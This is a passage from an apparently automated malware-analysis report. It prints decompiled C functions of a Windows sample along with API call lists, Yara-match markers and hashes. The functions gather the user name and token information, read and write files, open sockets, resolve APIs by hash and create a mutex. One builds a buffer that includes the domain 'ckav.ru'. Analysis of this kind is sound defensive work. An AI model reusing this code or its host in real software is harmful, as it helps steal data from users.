                                          • API String ID: 3615134276-2896544425
                                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                          0x00402b8c
                                          0x00402b92
                                          0x00402b96
                                          0x00402b9e
                                          0x00402ba3
                                          0x00402baa

                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID:
                                          • API String ID: 1357844191-0
                                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                          0x00406077
                                          0x00406082
                                          0x00406085

                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                          0x004061c3
                                          0x004061cb
                                          0x004061cd
                                          0x004061d0
                                          0x004061de
                                          0x004061e0
                                          0x004061e5
                                          0x004061e9
                                          0x004061eb
                                          0x004061ed
                                          0x004061f2
                                          0x0040622a
                                          0x00406230
                                          0x00406235
                                          0x00406239
                                          0x0040623b
                                          0x00406244
                                          0x00406249
                                          0x00406249
                                          0x0040624c
                                          0x00406253
                                          0x00406256
                                          0x00406258
                                          0x00406261
                                          0x00406266
                                          0x00406266
                                          0x00406270
                                          0x00406273
                                          0x00406276
                                          0x0040627b
                                          0x0040627e
                                          0x0040628c
                                          0x0040628e
                                          0x00406290
                                          0x00406295
                                          0x0040629a
                                          0x0040629e
                                          0x004062a0
                                          0x004062ac
                                          0x004062af
                                          0x004062b7
                                          0x004062b9
                                          0x004062c9
                                          0x004062e0
                                          0x004062e2
                                          0x004062e4
                                          0x004062f3
                                          0x004062f3
                                          0x004062e4
                                          0x004062f8
                                          0x004062fd
                                          0x004062a0
                                          0x004062fe
                                          0x00406302
                                          0x00406307
                                          0x0040630c
                                          0x0040630d
                                          0x0040630f
                                          0x00406312
                                          0x00406317
                                          0x00406318
                                          0x0040631c
                                          0x0040631e
                                          0x00406321
                                          0x00406326
                                          0x00000000
                                          0x00406327
                                          0x004061f4
                                          0x004061ff
                                          0x00406208
                                          0x00406218
                                          0x0040621d
                                          0x00406224
                                          0x00406226
                                          0x00406228
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406228
                                          0x00406201
                                          0x00000000

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                          • _wmemset.LIBCMT ref: 00406244
                                          • _wmemset.LIBCMT ref: 00406261
                                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: _wmemset$ErrorInformationLastToken
                                          • String ID: IDA$IDA
                                          • API String ID: 487585393-2020647798
                                          • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                          • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                          0x00404e1d
                                          0x00404e26
                                          0x00404e2a
                                          0x00404e2f
                                          0x00404e37
                                          0x00404e3a
                                          0x00404e45
                                          0x00404e4f
                                          0x00404e57
                                          0x00404e61
                                          0x00404e66
                                          0x00404e68
                                          0x00404e6c
                                          0x00404e6e
                                          0x00404e7a
                                          0x00404e80
                                          0x00404e84
                                          0x00404e9f
                                          0x00404ea7
                                          0x00404eab
                                          0x00404eb1
                                          0x00404eb1
                                          0x00404eb6
                                          0x00404ebe
                                          0x00404ecb
                                          0x00000000
                                          0x00404ec0
                                          0x00404ec1
                                          0x00404ec7
                                          0x00404ec7
                                          0x00404ecd
                                          0x00000000
                                          0x00404ece
                                          0x00404ebe
                                          0x00404e87
                                          0x00404e90
                                          0x00000000
                                          0x00404e90
                                          0x00000000

                                          APIs
                                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                          • socket.WS2_32(?,?,?), ref: 00404E7A
                                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: freeaddrinfogetaddrinfosocket
                                          • String ID:
                                          • API String ID: 2479546573-0
                                          • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                          • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                          0x004040c4
                                          0x004040ce
                                          0x004040d0
                                          0x004040e8
                                          0x004040ea
                                          0x004040ec
                                          0x004040f2
                                          0x0040418d
                                          0x00404190
                                          0x00404184
                                          0x00000000
                                          0x00404184
                                          0x004041a0
                                          0x004041a5
                                          0x004041a7
                                          0x00000000
                                          0x00000000
                                          0x004041a9
                                          0x004041b6
                                          0x004041b8
                                          0x004041be
                                          0x004041cb
                                          0x004041d0
                                          0x004041d1
                                          0x004041d3
                                          0x004041d8
                                          0x004041dc
                                          0x00000000
                                          0x004041e2
                                          0x00404100
                                          0x0040410c
                                          0x00404111
                                          0x0040417a
                                          0x0040417a
                                          0x00000000
                                          0x0040411b
                                          0x0040411b
                                          0x00404120
                                          0x00404122
                                          0x00404122
                                          0x0040412c
                                          0x0040413a
                                          0x0040413c
                                          0x00404140
                                          0x00000000
                                          0x00404142
                                          0x0040414a
                                          0x00404155
                                          0x0040415a
                                          0x0040415e
                                          0x00404168
                                          0x00404174
                                          0x00404176
                                          0x00404176
                                          0x0040417d
                                          0x0040417e
                                          0x00000000
                                          0x00404183
                                          0x00404140

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: File$AllocCreateReadVirtual
                                          • String ID: .tmp
                                          • API String ID: 3585551309-2986845003
                                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                          0x0041386f
                                          0x0041387e
                                          0x00413885
                                          0x00413889
                                          0x0041388c
                                          0x00413890
                                          0x00413893
                                          0x00413897
                                          0x0041389a
                                          0x0041389e
                                          0x004138a1
                                          0x004138a5
                                          0x004138a8
                                          0x004138ac
                                          0x004138af
                                          0x004138b2
                                          0x004138b5
                                          0x004138b8
                                          0x004138bb
                                          0x004138bc
                                          0x004138c4
                                          0x004138c8
                                          0x004138cb
                                          0x004138cf
                                          0x004138d2
                                          0x004138d6
                                          0x004138d7
                                          0x004138df
                                          0x004138e3
                                          0x004138e4
                                          0x004138ea
                                          0x004138eb
                                          0x004138f1
                                          0x004138f5
                                          0x004138f9
                                          0x004138fd
                                          0x00413901
                                          0x00413905
                                          0x00413909
                                          0x0041390d
                                          0x00413911
                                          0x00413915
                                          0x00413919
                                          0x0041391d
                                          0x00413921
                                          0x00413925
                                          0x00413929
                                          0x0041392d
                                          0x00413931
                                          0x00413935
                                          0x00413939
                                          0x0041393d
                                          0x00413941
                                          0x00413950
                                          0x00413959
                                          0x0041395f
                                          0x00413968
                                          0x0041396e
                                          0x00413973
                                          0x00413977
                                          0x00413979
                                          0x00413980
                                          0x00413982
                                          0x00413991
                                          0x0041399c
                                          0x0041399e
                                          0x004139a4
                                          0x004139a9
                                          0x004139ac
                                          0x004139b1
                                          0x004139b1
                                          0x004139b2
                                          0x004139b7
                                          0x004139bc
                                          0x004139c1
                                          0x004139c7
                                          0x004139cd
                                          0x004139cd
                                          0x004139db

                                          APIs
                                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                          • GetLastError.KERNEL32 ref: 0041399E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Error$CreateLastModeMutex
                                          • String ID:
                                          • API String ID: 3448925889-0
                                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                          0x004042cf
                                          0x004042d5
                                          0x004042df
                                          0x004042e2
                                          0x004042f9
                                          0x004042fb
                                          0x00404300
                                          0x0040430a
                                          0x00404314
                                          0x00404319
                                          0x00404323
                                          0x00404334
                                          0x0040433b
                                          0x0040433b
                                          0x0040433f
                                          0x00404344
                                          0x0040434c

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreatePointerWrite
                                          • String ID:
                                          • API String ID: 3672724799-0
                                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
